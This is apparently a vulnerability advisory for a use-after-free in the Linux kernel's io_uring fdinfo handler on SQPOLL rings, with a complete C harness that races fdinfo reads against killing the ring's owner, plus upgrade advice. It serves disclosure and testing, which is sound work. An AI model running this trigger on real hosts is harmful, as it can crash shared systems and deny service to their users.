Linux kernel
cpe:2.3:a:linux:linux_kernel:*:*:*:*:*:*:*
A use-after-free vulnerability has been identified in the Linux kernel's io_uring implementation, in the __io_uring_show_fdinfo() function (io_uring/fdinfo.c), the handler that produces /proc/<pid>/fdinfo/<fd> for a ring file descriptor. For a ring created with IORING_SETUP_SQPOLL the handler dereferences sq->thread, the task_struct of the submission-queue polling thread, without holding a reference that outlives that thread. The SQPOLL thread can exit, and the ring be torn down, while an fdinfo read is still using the pointer, so the handler touches freed memory. The problem was reported by syzbot against kernel version 6.16.0-rc1.
Triggering the bug needs only local access: a process that owns an SQPOLL ring and a reader of its fdinfo entry. The dependable outcome is a kernel crash, i.e. a local denial of service; as with any kernel use-after-free, wider memory corruption and from there arbitrary code execution cannot be ruled out, although no such exploit is described here.
The vulnerability can be reproduced with the following sequence: create an io_uring instance with IORING_SETUP_SQPOLL, so that submission is offloaded to a kernel-side SQPOLL thread; read /proc/<pid>/fdinfo/<fd> for the ring, which walks sq->thread; and, concurrently, tear the ring down (close the descriptor or let the owning process exit), which stops the SQPOLL thread and releases the task that the fdinfo read is still using. Winning that race leaves the fdinfo handler operating on a freed task_struct.
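The harness below is an added example written for this entry; it is not syzbot's reproducer and not kernel code. It drives the sequence above from user space: a child process owns an IORING_SETUP_SQPOLL ring, the parent repeatedly reads /proc/<pid>/fdinfo/<fd> (the entry served by __io_uring_show_fdinfo(), whose SqThread: line is filled in from sq->thread), then SIGKILLs the child so the ring and its SQPOLL thread are torn down while reads are in flight, and keeps reading until the entry disappears. All helper names (run_fdinfo_race, race_round, parse_sq_thread, create_sqpoll_ring, struct race_result) are this example's own. It assumes Linux with /proc mounted and <linux/io_uring.h> available; where io_uring_setup(2) is unavailable or blocked by seccomp it records the errno instead of failing. Whether an unpatched kernel actually produces a KASAN report depends on scheduling; on a patched kernel the program completes silently.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <linux/io_uring.h>

#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup 425 /* unified syscall table (x86_64, arm64, riscv, ...) */
#endif

struct race_result {
    int  setup_errno;   /* errno from io_uring_setup() in the child, 0 if the ring was created */
    int  sys_errno;     /* errno from pipe/fork/open of the fdinfo entry, 0 if none */
    int  rounds_run;    /* rounds completed: ring created, read, owner killed, entry gone */
    long fdinfo_reads;  /* successful fdinfo reads over all rounds */
    long live_sqthread; /* reads whose SqThread: field carried a live pid */
};

/* Parse the SqThread: line of an io_uring fdinfo dump. Returns the pid,
 * -1 when the kernel printed -1 (no live thread), -2 when the field is absent. */
int parse_sq_thread(const char *text)
{
    const char *p = strstr(text, "SqThread:");
    if (!p)
        return -2;
    return atoi(p + strlen("SqThread:"));
}

/* Raw io_uring_setup(2) with SQPOLL; no liburing needed. */
static int create_sqpoll_ring(void)
{
    struct io_uring_params p;
    memset(&p, 0, sizeof p);
    p.flags = IORING_SETUP_SQPOLL;
    p.sq_thread_idle = 2000; /* ms the SQPOLL thread keeps running before it sleeps */
    return (int)syscall(__NR_io_uring_setup, 4, &p);
}

/* One round: the child owns an SQPOLL ring; the parent reads its fdinfo,
 * SIGKILLs the child after reads_before_kill reads (exit stops the SQPOLL
 * thread and tears the ring down) and keeps reading until the entry is gone. */
static int race_round(struct race_result *r, int reads_before_kill)
{
    int pipefd[2], msg, reads = 0, killed = 0, ok = 0;
    if (pipe(pipefd) < 0) { r->sys_errno = errno; return -1; }
    pid_t pid = fork();
    if (pid < 0) { r->sys_errno = errno; return -1; }
    if (pid == 0) {
        int ring = create_sqpoll_ring();
        msg = ring < 0 ? -errno : ring;
        if (write(pipefd[1], &msg, sizeof msg) != sizeof msg) _exit(1);
        for (;;) pause(); /* hold the ring open until killed */
    }
    close(pipefd[1]);
    if (read(pipefd[0], &msg, sizeof msg) != sizeof msg) msg = -EIO;
    close(pipefd[0]);
    if (msg < 0) { /* child could not create the ring */
        r->setup_errno = -msg;
        kill(pid, SIGKILL); waitpid(pid, NULL, 0);
        return -1;
    }
    char path[64], buf[8192];
    snprintf(path, sizeof path, "/proc/%d/fdinfo/%d", (int)pid, msg);
    for (long i = 0; i < 200000; i++) {
        int fd = open(path, O_RDONLY);
        if (fd < 0) {
            if (killed) { ok = 1; break; } /* owner gone: the window has closed */
            r->sys_errno = errno; break;
        }
        ssize_t n = read(fd, buf, sizeof buf - 1);
        close(fd);
        if (n <= 0) continue;            /* transient failure while the child exits */
        buf[n] = '\0';
        r->fdinfo_reads++;
        if (parse_sq_thread(buf) > 0) r->live_sqthread++;
        if (!killed && ++reads == reads_before_kill) { kill(pid, SIGKILL); killed = 1; }
    }
    if (!killed) kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);
    if (ok) r->rounds_run++;
    else if (!r->sys_errno) r->sys_errno = ETIMEDOUT;
    return ok ? 0 : -1;
}

struct race_result run_fdinfo_race(int rounds, int reads_before_kill)
{
    struct race_result r = {0};
    for (int i = 0; i < rounds; i++)
        if (race_round(&r, reads_before_kill) < 0) break;
    return r;
}

int main(void)
{
    struct race_result r = run_fdinfo_race(20, 200);
    if (r.setup_errno)
        printf("io_uring_setup(SQPOLL) failed: %s\n", strerror(r.setup_errno));
    else if (r.sys_errno)
        printf("could not drive the race: %s\n", strerror(r.sys_errno));
    printf("rounds=%d fdinfo_reads=%ld live_sqthread=%ld\n",
           r.rounds_run, r.fdinfo_reads, r.live_sqthread);
    return 0;
}
```

Build with `gcc -O2 race.c -o race` and run it only on a disposable test kernel, ideally one built with KASAN so a hit shows up as a report rather than a silent corruption; raise the round count or run several copies to widen the window.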
The issue is fixed upstream. Users should upgrade to a kernel release that contains the fix, which for most deployments means the latest stable kernel of their series; the running version can be checked with `uname -r` and compared against the fixed release for that series. Systems that cannot be rebooted promptly reduce exposure by keeping untrusted local users off the host, since the trigger requires only an SQPOLL ring and a read of its fdinfo entry.